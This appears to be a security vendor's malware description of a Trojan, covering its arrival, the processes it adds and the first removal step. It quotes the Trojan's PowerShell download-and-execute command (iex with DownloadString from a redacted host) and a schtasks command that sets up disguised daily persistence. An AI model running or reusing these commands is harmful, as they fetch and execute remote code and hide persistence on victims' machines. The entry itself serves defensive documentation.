This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
This Trojan drops the following copies of itself into the affected system:
- {malware path and file name}
It adds the following processes:
- "%System%\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://power.{BLOCKED}yquote.com/?need=stdgeyt&vid=dpec16&29916'));
- powershell iex ((New-Object Net.WebClient).DownloadString('http://power.{BLOCKED}yquote.com/?need=stdgeyt&vid=dpec16&29916'));
- "%System%\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 18 /du 23:59 /TR %System Root%\Users\Public\Libraries\WindowsIndexingService.vbs

Step 1
Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.
